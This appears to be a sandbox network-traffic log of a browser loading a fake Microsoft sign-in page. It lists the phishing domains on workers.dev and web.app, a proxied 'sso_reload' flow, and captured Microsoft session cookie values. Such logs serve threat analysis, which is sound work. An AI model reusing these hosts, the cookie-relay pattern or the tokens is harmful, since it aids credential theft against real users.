Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/css/d35c51ca863429284bf173d706c95f1cnbr1706715983.css HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /axios@0.16.1/dist/axios.min.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.js HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vue@2.6.11/dist/vue.min.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vue-router@2.7.0/dist/vue-router.min.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/vuex/2.3.1/vuex.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/vue-i18n/7.0.3/vue-i18n.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lodash@4.17.4/lodash.min.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/149def4ccd8dab4c569bcf0843fd0619.js HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/js/238d344c676a54d66afd34590ccc34d21706715975.js HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/microsoft_logo.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_white.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_grey.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/microsoft_logo.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_white.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_grey.svg HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /re/65ba6b45a7471c8dd3b9f0fd HTTP/1.1Host: smsmail.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: khanmotiozpisx.ellieb7.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_GOwG3D936OfJ_-lzWtiHhg2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://niakallzodamiozxza.pixiepowder00.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?bbre=CrjRQgGBVdEMWTyZx HTTP/1.1Host: khanmotiozpisx.ellieb7.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js HTTP/1.1Host: rkugxtvgxusbsfrtcv.kute.pwConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 0=ClientId=D9C2F492036542D7B620525A5AE812A4; 1=ClientId=D9C2F492036542D7B620525A5AE812A4; 2=OIDC=1; 16=OpenIdConnect.nonce.v3.qJhtZeYy5595AisBktGm1g-WewnDlrSvB_nnCXw3KxM=638430701964064084.195dbe94-fd4c-4e53-bd28-e473e0b7cb9d; 20=ClientId=D9C2F492036542D7B620525A5AE812A4; 21=OIDC=1; 35=OpenIdConnect.nonce.v3.qJhtZeYy5595AisBktGm1g-WewnDlrSvB_nnCXw3KxM=638430701964064084.195dbe94-fd4c-4e53-bd28-e473e0b7cb9d; 39=X-OWA-RedirectHistory=ArLym14BVHVFRFcp3Ag; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; fpc=ArvVJjjyUS1Oi-H4QOh3so0; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-gWsZ9Uhk4_6Y4sQC0iocttLtYFM8xqaPg4bTrptYHxytB9tCoxoAzMOWls8mGrr3d8S3ZYYgXyLjJbyvnH05WMkxhp7jS_WDZ-2j9hnln9EldBwLbNq_YUm1a-4JsAFwwK_ZQbmk6jp4lyKVW8NGeY98xQEtM3-IOM0i-KmOEJYgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 0=ClientId=D9C2F492036542D7B620525A5AE812A4; 1=ClientId=D9C2F492036542D7B620525A5AE812A4; 2=OIDC=1; 16=OpenIdConnect.nonce.v3.qJhtZeYy5595AisBktGm1g-WewnDlrSvB_nnCXw3KxM=638430701964064084.195dbe94-fd4c-4e53-bd28-e473e0b7cb9d; 20=ClientId=D9C2F492036542D7B620525A5AE812A4; 21=OIDC=1; 35=OpenIdConnect.nonce.v3.qJhtZeYy5595AisBktGm1g-WewnDlrSvB_nnCXw3KxM=638430701964064084.195dbe94-fd4c-4e53-bd28-e473e0b7cb9d; 39=X-OWA-RedirectHistory=ArLym14BVHVFRFcp3Ag; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; fpc=ArvVJjjyUS1Oi-H4QOh3so0; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-gWsZ9Uhk4_6Y4sQC0iocttLtYFM8xqaPg4bTrptYHxytB9tCoxoAzMOWls8mGrr3d8S3ZYYgXyLjJbyvnH05WMkxhp7jS_WDZ-2j9hnln9EldBwLbNq_YUm1a-4JsAFwwK_ZQbmk6jp4lyKVW8NGeY98xQEtM3-IOM0i-KmOEJYgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://niakallzodamiozxza.pixiepowder00.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://niakallzodamiozxza.pixiepowder00.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://niakallzodamiozxza.pixiepowder00.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 2=OIDC=1; 21=OIDC=1; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; 0=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 1=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 16=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 20=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 35=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 39=X-OWA-RedirectHistory=ArLym14BV24jRVcp3Ag; buid=0.AQoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QiWunb7PCd_EJsCp5xqZ1msAmgBchDJDI-4A-gKCWcP7Bum4_wUhBzSM9ujw79V2ClGe7QXyl5lGZJoy3qCHtQYesMeW9SB1kZfs6utnfQ0gAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-KtuURlS65aS2k6oScv_nFUCId84x_8r0S3fy34zphqcb_bL0MCk4rVm3KosZLutFI6hW1S5Kdifg1e3UObq5H6ONTUlZx_Muhyr1_z5fPZBwNMlW_kIulAJnj9sfYNvHRP01WHv-zWLI4wJry8YBcjxdErepDoK_hTw_9oe6rgsgAA; 